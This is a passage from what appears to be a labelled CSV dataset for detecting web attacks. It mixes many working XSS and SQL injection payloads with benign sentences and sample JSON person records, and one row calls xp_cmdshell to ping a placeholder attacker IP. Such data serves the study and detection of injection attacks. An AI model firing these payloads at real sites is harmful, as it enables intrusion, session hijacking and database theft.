onfocus=""alert(1)"">",1,XSS,16 "<big onbeforecut=""alert(1)"" contenteditable>test</big>",1,XSS,4780 "<;SCRIPT a="";>;""; SRC="";http://ha.ckers.org/xss.js"";>;<;/SCRIPT>;",1,XSS,2794 "1', ( select ( case when ( 6894 = 6087 ) then 1 else 6894* ( select 6894 from information_schema.character_sets ) end ) )",2,SQLi,13101 "1' ) ) and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ( ( 'ngwt' = 'ngwt",2,SQLi,11143 "UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15#",2,SQLi,18038 select ( case when ( 6166 = 3364 ) then 6166 else cast ( 1 as int ) / ( select 0 from dual ) end ) from dual--,2,SQLi,13607 "<dir oncut=""alert(1)"" contenteditable>test</dir>",1,XSS,5924 "select * from users where id = 1 or ""@?"" or 1 = 1 -- 1",2,SQLi,17923 Where's your SQL dataset?,3,normal,23420 "=+benchmark(3200,SHA1(1))+'",2,SQLi,9884 --></style></script><svg oNload=alert()>,1,XSS,8070 "1%"" ) and 5556 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) and ( ""%"" = """,2,SQLi,13032 Where's the nearest gas station?,3,normal,23495 "Immediately afterward he was a member of a commission appointed ""to revise the laws in force in the state; to select, abridge, alter and digest them, so as to be accommodated to the present government.""",3,normal,26037 ";alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//"";alert(String.fromCharCode(88,83,83))//--></SCRIPT>"">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>",1,XSS,100 <param onfocusout=alert(1) tabindex=1 id=x></param><input autofocus>,1,XSS,2608 "1 ) ) as dnwj where 2961 = 2961 and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --",2,SQLi,11074 "( select * from ( select ( sleep ( 5 ) ) ) srmq ) and ( ( ""%"" = """,2,SQLi,16730 "1"" ) ) union all select null,null,null#",2,SQLi,19640 1' ) as bzem where 4240 = 4240,2,SQLi,20571 <img alt='%></xmp><img src=xx:x onerror=aler,1,XSS,7041 "{""id"":null,""firstName"":""Yap"",""lastName"":""Chin"",""address"":""146 EAST FIRST AVE, WILLIAMSON WV 25661"",""city"":""475"",""telephone"":""5079823086""}",3,normal,26917 "<div id=""29""><link rel=stylesheet href=data:,*%7bx:expression(alert(29))%7d//[""'`-->]]>]</div><div id=""30""><style>@import ""data:,*%7bx:expression(alert(30))%7D"";</style>//[""'`-->]]>]</div><div id=""31""><frameset onload=alert(31)>//[""'`-->]]>]</div><div id=""32""><table background=""javascript:alert(32)""></table>//[""'`-->]]>]</div><div id=""33""><a style=""pointer-events:none;position:absolute;""><a style=""position:absolute;"" onclick=""alert(33);"">XXX</a></a><a href=""javascript:alert(2)"">XXX</a>//[""'`-->]]>]</div><div id=""34"">1<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=test.vml#xss></vmlframe>//[""'`-->]]>]</div><div id=""35"">1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:alert(35) strokecolor=white strokeweight=1000px from=0 to=1000 /></a>//[""'`-->]]>]</div><div id=""36""><a style=""behavior:url(#default#AnchorClick);"" folder=""javascript:alert(36)"">XXX</a>//[""'`-->]]>]</div><div id=""37""><!--<img src=""--><img src=x onerror=alert(37)//"">//[""'`-->]]>]</div><div id=""38""><comment><img src=""</comment><img src=x onerror=alert(38)//"">//[""'`-->]]>]</div>",1,XSS,7 "1"" ) ) ) and elt ( 2421 = 9612,9612 ) and ( ( ( ""gbdx"" like ""gbdx",2,SQLi,16719 ORDER BY 16,2,SQLi,22374 "<pre onkeypress=""alert(1)"" contenteditable>test</pre>",1,XSS,5014 1%' rlike sleep ( 5 ) and '%' = ',2,SQLi,20222 "{""id"":null,""firstName"":""Ivan"",""lastName"":""Lock"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,26885 <frame id=x tabindex=1 onactivate=alert(1)></frame>,1,XSS,5415 "<font onclick=""alert(1)"">test</font>",1,XSS,8806 "<style>@keyframes slidein {}</style><s style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></s>",1,XSS,463 -8370' ) ) or ( 3501 = 6407 ) *6407 and ( ( 'agcm' like 'agcm,2,SQLi,17048 "<style>@keyframes slidein {}</style><dd style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></dd>",1,XSS,442 "{""id"":null,""firstName"":""Shirley"",""lastName"":""Lim"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,27473 Select aid.,3,normal,24740 Select your message.,3,normal,24904 -5852 ) as anca where 3574 = 3574 or 3958 = 5536#,2,SQLi,18591 "1'+ ( select mumb where 4658 = 4658 or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 ) = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,11578 "-5026' where 7324 = 7324 union all select 7324,7324--",2,SQLi,18060 "<html onMouseUp html onMouseUp=""javascript:javascript:alert(1)""></html onMouseUp>",1,XSS,1940 ORDER BY 28--,2,SQLi,22251 <keygen autofocus onfocus=alert(1)>,1,XSS,9120 ORDER BY SLEEP(5),2,SQLi,22084 "<em draggable=""true"" ondragleave=""alert(1)"">test</em>",1,XSS,4872 Where's the best place to take a stroll?,3,normal,23878 "From here, select the data-hogging apps and disable background data.",3,normal,26168 "1"" ) as qjyu where 2679 = 2679 and 6414 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,12093 <audio onpointerout=alert(1)>XSS</audio>,1,XSS,7978 "Buy 1, get 1 free* on select Nature Made® vitamins.",3,normal,26305 "AND ELT(1337=1337,SLEEP(5)) AND 1337""=""1337",2,SQLi,19166 Getting herself fired allowed Trump to select a non-conflicted replacement.,3,normal,26146 "1' ) ) ) and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ( ( ( 'tvar' = 'tvar",2,SQLi,11100 "1"" ) ) union all select null,null,null,null,null,null,null#",2,SQLi,17310 "<slot onmouseenter=""alert(1)"">test</slot>",1,XSS,7707 "-1917"" ) or 8571 = 8571--",2,SQLi,21082 Demonstrate the ability to select relevant principles from theories to support the practice of Occupational therapy.,3,normal,26247 1' ) ) and ( select * from ( select ( sleep ( 5 ) ) ) fzno ) and ( ( 'vpqr' = 'vpqr,2,SQLi,15040 "<div id=""94""><svg xmlns=""http://www.w3.org/2000/svg"">",1,XSS,5071 "1"" ) where 2633 = 2633 union all select null,null,null,null#",2,SQLi,17161 "<iframe onmouseout=""alert(1)"">test</iframe>",1,XSS,7225 "-6731"" where 6166 = 6166 union all select 6166,6166,6166,6166,6166,6166--",2,SQLi,15898 I'm thinking of where to go for some relaxation.,3,normal,23936 "<div draggable=""true"" contenteditable>drag me</div><keygen ondragover=alert(1) contenteditable>drop here</keygen>",1,XSS,881 "{""id"":null,""name"":""Blitzle""}",3,normal,27225 "1' ) ) ) union all select null,null,null,null#",2,SQLi,18967 "1' or 7552 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) and 'ynpr' = 'ynpr",2,SQLi,12581 "Olsen, who joined M&G in April 2014, will remain manager of the M&G Global Select Fund and the M&G Pan European Select Fund.",3,normal,25857 "<u onbeforecopy=""alert(1)"" contenteditable>test</u>",1,XSS,5467 "<meter onmousedown=""alert(1)"">test</meter>",1,XSS,7514 1' ) rlike ( select ( case when ( 7689 = 7689 ) then 1 else 0x28 end ) ),2,SQLi,15957 "<abbr onmouseenter=""alert(1)"">test</abbr>",1,XSS,7667 "1"" or sleep ( 5 )",2,SQLi,22101 "<style>:target {transform: rotate(180deg);}</style><listing id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></listing>",1,XSS,570 Insert code.,3,normal,23049 "UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19",2,SQLi,16742 "-5245"" ) ) ) union all select 8106,8106,8106#",2,SQLi,19038 "1'|| ( select 'xpjg' where 3036 = 3036 and elt ( 1832 = 6644,6644 ) ) ||'",2,SQLi,15866 <b onpointerup=alert(1)>XSS</b>,1,XSS,9504 "1 ) where 9206 = 9206 union all select null,null,null,null,null,null#",2,SQLi,16289 "1"" ) where 2834 = 2834 ( select ( case when ( 5451 = 5451 ) then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null ) else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 ) end ) from information_schema.system_users ) --",2,SQLi,10859 "<frame onmouseenter=""alert(1)"">test</frame>",1,XSS,7184 Select surprise.,3,normal,24733 "<style onmouseup=""alert(1)"">test</style>",1,XSS,8049 "1 ) where 7425 = 7425 union all select null,null,null,null,null,null,null,null,null,null--",2,SQLi,14678 "{""id"":null,""firstName"":""Kieu"",""lastName"":""Doan"",""address"":""6980 Dorsett Rd"",""city"":""567"",""telephone"":""3812314136""}",3,normal,27524 <script> Object.prototype.srcdoc=['<script>alert(1)<\/script>']</script>,1,XSS,2335 "{""id"":null,""firstName"":""Eve"",""lastName"":""Ang"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,27166 "{""id"":null,""firstName"":""Adrian"",""lastName"":""Khong"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,26863 <rb onpointerdown=alert(1)>XSS</rb>,1,XSS,9084 How did you select which women to feature in the documentary?,3,normal,26084 <header onfocusout=alert(1) tabindex=1 id=x></header><input autofocus>,1,XSS,2527 &lt;,1,XSS,9879 1'+ ( select aqhj where 4419 = 4419,2,SQLi,20042 "1"" ) order by 1#",2,SQLi,22141 select case when 3252 = 9622 then 1 else null end--,2,SQLi,18309 "<summary onmouseover=""alert(1)"">test</summary>",1,XSS,6491 1' ) as yxdb where 4597 = 4597,2,SQLi,20634 "<samp onkeypress=""alert(1)"" contenteditable>test</samp>",1,XSS,4456 "{""id"":null,""name"":""course""}",3,normal,27312 "{""id"":16436,""name"":""jmeter test <DO NOT DELETE>""}",3,normal,26803 "and 0=benchmark(3000000,MD5(1))%20%23",2,SQLi,19796 "-4721' ) or elt ( 4378 = 5165,5165 ) and ( 'fufn' = 'fufn",2,SQLi,17525 "select * from users where id = 1 or 1#""@ union select 1,version ( ) -- 1",2,SQLi,15947 "<b oncopy=""alert(1)"" contenteditable>test</b>",1,XSS,6736 "1' ) as wnys where 6457 = 6457 or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c ) ) #",2,SQLi,15041 Let's choose a location for our gathering.,3,normal,23971 "<thead onbeforecut=""alert(1)"" contenteditable>test</thead>",1,XSS,3894 <tfoot onfocusout=alert(1) tabindex=1 id=x></tfoot><input autofocus>,1,XSS,2615 "( select * from ( select ( sleep ( 5 ) ) ) srmq ) and ( ""%"" = """,2,SQLi,16866 "<u onmousemove=""alert(1)"">test</u>",1,XSS,9241 "<hr oncopy=""alert(1)"" contenteditable>test</hr>",1,XSS,6178 "1"" where 7788 = 7788 or 4411 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,11542 Select your desire.,3,normal,24939 Select a song to play.,3,normal,24162 -1985 ) ) ) or 4144 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4144 = 4144 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) and ( ( ( 1248 = 1248,2,SQLi,9977 <footer onpointerenter=alert(1)>XSS</footer>,1,XSS,6938 "1%' ) or exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 6270 = 6270,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) and ( '%' = '",2,SQLi,12162 "<video autoplay controls onwaiting=alert(1)><source src=""validvideo.mp4"" type=video/mp4></video>",1,XSS,1577 "1%"" ) and 8514 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) and ( ""%"" = """,2,SQLi,13150 "<frame onmouseup=""alert(1)"">test</frame>",1,XSS,7991 Search records where relevant.,3,normal,23261 perl -e &apos;print &quot;&lt;IMG SRC=java\0script:alert(&quot;XSS&quot;)>&quot;;&apos;&gt; out,1,XSS,1585 "1' ) and make_set ( 6488 = 5525,5525 )",2,SQLi,19788 "<style>@keyframes x{}</style><footer style=""animation-name:x"" onanimationend=""alert(1)""></footer>",1,XSS,1522 "{""id"":null,""name"":""Venipede""}",3,normal,27300 "<style>@keyframes x{}</style><style style=""animation-name:x"" onanimationend=""alert(1)""></style>",1,XSS,1619 "1"" union all select null,null#",2,SQLi,20649 "1%' ) and exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8190 = 8190,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) and ( '%' = '",2,SQLi,12145 "-1617%"" or 2724 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 2724 = 2724 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ""%"" = """,2,SQLi,10788 "{""id"":null,""firstName"":""Chai"",""lastName"":""Kon Moi"",""address"":""305 W 45th St, New York NY 10036"",""city"":""957"",""telephone"":""4065619129""}",3,normal,26750 "1%' ) ) ) and elt ( 7425 = 3843,3843 ) and ( ( ( '%' = '",2,SQLi,17633 <img src =q onerror=prompt(8)>,1,XSS,9525 "1"" ) and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select ( elt ( 7982 = 7982,1 ) ) ) ,0x717a767a71 ) ) and ( ""rfpq"" = ""rfpq",2,SQLi,12628 Select your reflect.,3,normal,24978 "1"" ) ) as wwqj where 3249 = 3249 and 9254 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,12049 "SRC=# onmouseover=""alert(document.cookie)",1,XSS,7624 -8963 ) where 8528 = 8528 or ( 2470 = 3271 ) *3271--,2,SQLi,18168 `'><script>\xE2\x80\x8Ajavascript:alert(513)</script>,1,XSS,5060 "{""id"":null,""firstName"":""Tony Quek"",""lastName"":""Quek"",""address"":""115 N WEBB RD, GRAND ISLAND NE 68803"",""city"":""229"",""telephone"":""4614015193""}",3,normal,27352 "1'|| ( select 'vixv' from dual where 7704 = 7704 union all select null,null,null,null,null--",2,SQLi,14588 Select buy.,3,normal,24562 "1%' ) ) ) union all select null,null,null,null#",2,SQLi,18820 <time id=x tabindex=1 ondeactivate=alert(1)></time><input id=y autofocus>,1,XSS,2320 <x%09onxxx=1,1,XSS,9832 "<style>@keyframes slidein {}</style><slot style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></slot>",1,XSS,407 "<script>$(""span.foo"").click(function() {alert('foo');$(""a.bar"").click();});$(""a.bar"").click(function() {alert('bar');location=""http://html5sec.org"";});</script>//[""'`-->]]>]</div>",1,XSS,221 "<audio onkeypress=""alert(1)"" contenteditable>test</audio>",1,XSS,4125 Select first.,3,normal,24489 "1 ) or 9643 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 )",2,SQLi,13962 Join hike.,3,normal,23048 "echo('IPT>alert(""XSS"")</SCRIPT>'); ?>",1,XSS,8759 <bgsound id=x tabindex=1 ondeactivate=alert(1)></bgsound><input id=y autofocus>,1,XSS,2039 "<html onmouseover=""alert(1)"">test</html>",1,XSS,7950 "<style>:target {color:red;}</style><spacer id=x style=""transition:color 1s"" ontransitionend=alert(1)></spacer>",1,XSS,1024 "<source onmouseup=""alert(1)"">test</source>",1,XSS,7437 1' and 3715 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 3715 = 3715 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ),2,SQLi,10909 "1"" ) ) and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ( ( ""yrgy"" like ""yrgy",2,SQLi,13758 "<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><big id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></big>",1,XSS,268 1' ) ) and sleep ( 5 ) and ( ( 'tcwt' = 'tcwt,2,SQLi,19036 "<nobr onclick=""alert(1)"">test</nobr>",1,XSS,8864 "<noembed onkeyup=""alert(1)"" contenteditable>test</noembed>",1,XSS,3829 Select a game for family game night.,3,normal,24201 "1"" or ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9173 = 9173,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) and ""bkrk"" = ""bkrk",2,SQLi,11037 Where's the mindfulness workshop?,3,normal,23661 "<style>@keyframes x{}</style><datalist style=""animation-name:x"" onanimationstart=""alert(1)""></datalist>",1,XSS,1353 "select * from users where id = 1 or "".]"" or 1 = 1 -- 1",2,SQLi,17867 Select a book for your reading pleasure.,3,normal,24010 "1 ( select ( case when ( 5451 = 5451 ) then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null ) else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 ) end ) from information_schema.system_users ) -- fzhj",2,SQLi,10958 "select * from users where id = 1 +\. union select null,@@VERSION -- 1",2,SQLi,16264 <![CDATA[<script>var n=0;while(true){n++;}</script>]]>,1,XSS,4667 "<style>:target {color: red;}</style><i id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></i>",1,XSS,1265 "-2384%' ) ) union all select 2467,2467,2467,2467#",2,SQLi,18596 "<element onkeydown=""alert(1)"" contenteditable>test</element>",1,XSS,3586 "<ins onkeyup=""alert(1)"" contenteditable>test</ins>",1,XSS,5526 "<nav oncontextmenu=""alert(1)"">test</nav>",1,XSS,7916 <select onpointerout=alert(1)>XSS</select>,1,XSS,7475 "<data onkeydown=""alert(1)"" contenteditable>test</data>",1,XSS,4725 "create or replace function sleep ( int ) returns int as '/lib/libc.so.6','sleep' language 'c' strict",2,SQLi,14151 union (select @@version) --,2,SQLi,20850 1 ) ) ) order by 1--,2,SQLi,21866 "<center oncut=""alert(1)"" contenteditable>test</center>",1,XSS,4764 "<hr onbeforecopy=""alert(1)"" contenteditable>test</hr>",1,XSS,4970 Congratulations to our own @ JulienMid and @ Value247 who have been selected on Team @ Yassuo for the upcoming League of Legends Twitch Rivals!... Will Value secure the three-peat? Will Julien win his first championship? Find out next week!..,3,normal,26513 1' or ( select * from ( select ( sleep ( 5 ) ) ) sddo ) #,2,SQLi,17493 "-2864' ) or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 1570 = 1570 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( 'vjbl' = 'vjbl",2,SQLi,10204 1 ) ) rlike ( select ( case when ( 6113 = 1222 ) then 1 else 0x28 end ) ) and ( ( 2815 = 2815,2,SQLi,14487 "1' ) where 8948 = 8948 and 8635 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,14455 Select the right shade of lipstick.,3,normal,24097 "1 ) where 5550 = 5550 ( select ( case when ( 5451 = 5451 ) then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null ) else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 ) end ) from information_schema.system_users ) --",2,SQLi,10869 "<header onbeforecut=""alert(1)"" contenteditable>test</header>",1,XSS,3519 "<style>@keyframes slidein {}</style><cite style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></cite>",1,XSS,397 <li onblur=alert(1) tabindex=1 id=x></li><input autofocus>,1,XSS,3835 Delete the email.,3,normal,22873 "To unfreeze the frames, select ""View,"" then select ""Unfreeze Panes.""",3,normal,25258 "<kbd onbeforecut=""alert(1)"" contenteditable>test</kbd>",1,XSS,4710 1 or sleep ( 5 ) #,2,SQLi,22064 "<center draggable=""true"" ondragenter=""alert(1)"">test</center>",1,XSS,3309 <command onpointerleave=alert(1)>XSS</command>,1,XSS,6293 "1"" ) rlike sleep ( 5 ) #",2,SQLi,21234 <table id=x tabindex=1 onactivate=alert(1)></table>,1,XSS,5442 <dl onpointerout=alert(1)>XSS</dl>,1,XSS,9263 "In a primary, voters select one candidate on a ballot.",3,normal,26020 "1"" ) ) as whyr where 9731 = 9731 rlike ( select * from ( select ( sleep ( 5 ) ) ) sgvo ) --",2,SQLi,14641 "1"" ) ) or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ( ( ""dbxi"" like ""dbxi",2,SQLi,11102 1' ) where 8167 = 8167,2,SQLi,21559 select ( case when ( 9907 = 2736 ) then 9907 else 9907* ( select 9907 from mysql.db ) end ) #,2,SQLi,14552 1' ) ) as cimd where 9608 = 9608,2,SQLi,20270 <D3/OnMouSEenTer=[2].find(confirm)>z,1,XSS,8953 "1"" ) ) as riui where 2605 = 2605",2,SQLi,20292 Aggregate data where valid.,3,normal,23320 1' ) as qqyz where 2274 = 2274,2,SQLi,20632 Its 2015 Berry Select Riesling was given a score of 94.,3,normal,25949 Let's choose a book for our book club.,3,normal,23801 "AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=2)) AND 'i'='i",2,SQLi,11808 1' ) and ( select * from ( select ( sleep ( 5 ) ) ) fzno ) and ( 'svwr' = 'svwr,2,SQLi,15268 "1"" ) ) ) rlike ( select ( case when ( 7689 = 7689 ) then 1 else 0x28 end ) ) and ( ( ( ""asvy"" = ""asvy",2,SQLi,14108 max,3,normal,23146 -8086%' ) or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4493 = 4493 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) and ( '%' = ',2,SQLi,10508 "-6846%"" ) ) or ( 8459 = 8459 ) *4906 and ( ( ""%"" = """,2,SQLi,18166 element[attribute='<img src=x onerror=alert('XSS');>,1,XSS,5090 1' ) ) ) rlike ( select ( case when ( 4076 = 4881 ) then 1 else 0x28 end ) ) and ( ( ( 'grzs' = 'grzs,2,SQLi,14100 "1"" ) ) ) or 7552 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) and ( ( ( ""atlz"" = ""atlz",2,SQLi,12121 "<div draggable=""true"" contenteditable>drag me</div><textarea ondrop=alert(1) contenteditable>drop here</textarea>",1,XSS,897 "-6086"" union all select 8700,8700,8700,8700--",2,SQLi,19031 """)))))) waitfor delay '0:0:20' /*",2,SQLi,20184 "1'+ ( select hspl where 4530 = 4530 and 9660 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,12220 "<form action=x><button>XSS</button><select name=x><option><plaintext><script>token=""supersecret""</script>",1,XSS,1227 Where's the missing keychain?,3,normal,22591 "<textarea onmouseup=""alert(1)"">test</textarea>",1,XSS,6410 "select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and ( 'fwok' like 'fwok",2,SQLi,13363 "1' ) ) ) or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select ( elt ( 1808 = 1808,1 ) ) ) ,0x717a767a71 ) ,8666 ) and ( ( ( 'eugs' = 'eugs",2,SQLi,12208 "1' union all select null,null,null,null,null,null,null,null--",2,SQLi,17062 "<wbr onbeforecut=""alert(1)"" contenteditable>test</wbr>",1,XSS,4756 "1' ) or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null ) and ( 'xdfz' = 'xdfz",2,SQLi,11835 "{""id"":null,""name"":""rule""}",3,normal,27303 <canvas onpointerenter=alert(1)>XSS</canvas>,1,XSS,6958 <bdo id=x tabindex=1 onactivate=alert(1)></bdo>,1,XSS,6112 or 0=0 –,2,SQLi,22484 "<TABLE BACKGROUND=""javascript:alert('XSS')"">",1,XSS,6764 "1 ) where 5336 = 5336 union all select null,null,null,null,null,null,null,null,null,null#",2,SQLi,14733 "1"" and 6240 = ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' )",2,SQLi,13896 substring,3,normal,23197 Delete page.,3,normal,23088 <marquee onstart='javascript:alert&#x28;1&#x29;'>^__^,1,XSS,4862 "-5830 ) or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 1570 = 1570 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) )",2,SQLi,10691 -4904' ) as ogyu where 2821 = 2821 or 5982 = 1643,2,SQLi,18585 "1"" ) ) as tncm where 8203 = 8203 and 3707 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,12189 Select the right camera settings for the shot.,3,normal,24015 "<img src=""/"" =_="" title=""onerror='prompt(1)'"">",1,XSS,6268 1 ) ) and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4386 = 4386 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) and ( ( 1260 = 1260,2,SQLi,10438 I'm considering where to enjoy a meal.,3,normal,23808 select ( case when ( 1093 = 7693 ) then 1093 else 1/ ( select 0 ) end ) --,2,SQLi,15802 "<STYLE TYPE=""text/javascript"">javascript:alert(1);</STYLE>",1,XSS,3798 "1"" ) where 9511 = 9511 ( select ( case when ( 4587 = 4587 ) then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 ) end ) from ( values ( 0 ) ) ) --",2,SQLi,10443 "<figure onkeydown=""alert(1)"" contenteditable>test</figure>",1,XSS,3906 "Be careful which breed you select, because although he/she may appear small, cute and cuddly in the pet store, many rabbit breeds can grow to the be same size (or bigger) than a cat.",3,normal,26339 exec master..xp_cmdshell 'ping+<attackerip>',2,SQLi,19067 <svg><bdo onload=alert(1)></bdo>,1,XSS,9469 "1' and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select ( elt ( 3393 = 3393,1 ) ) ) ,0x717a767a71 ) ,1161 ) and 'kird' = 'kird",2,SQLi,12680 "call regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null ) and ""rugr"" = ""rugr",2,SQLi,14194 Faces Places is screening in select theaters beginning October 6.,3,normal,26202 "{""id"":null,""name"":""WarGreymon""}",3,normal,26927 select ( case when ( 7019 = 1998 ) then 7019 else 7019* ( select 7019 from mysql.db ) end ) #,2,SQLi,14489 Select your war.,3,normal,24920 "1%"" ) ) rlike ( select * from ( select ( sleep ( 5 ) ) ) vwyq ) #",2,SQLi,16724 1 ) where 4600 = 4600 or sleep ( 5 ) --,2,SQLi,19613 Select the freshest ingredients for the recipe.,3,normal,24065 "-9587 union all select 1568,1568,1568,1568,1568,1568#",2,SQLi,18134 "<input onmouseout=""alert(1)"">test</input>",1,XSS,7705 ORDER BY 1--,2,SQLi,22295 "select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and ( ( '%' = '",2,SQLi,13711 "<%tag onmouseover=""(alert('XSS'))""> is invalid. <%br />",1,XSS,4638 "1"" ) ) as dnhd where 2657 = 2657 or 4240 = ( select 4240 from pg_sleep ( 5 ) ) --",2,SQLi,15121 "1"" ) where 8588 = 8588",2,SQLi,21534 "&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;",1,XSS,2790 "<embed 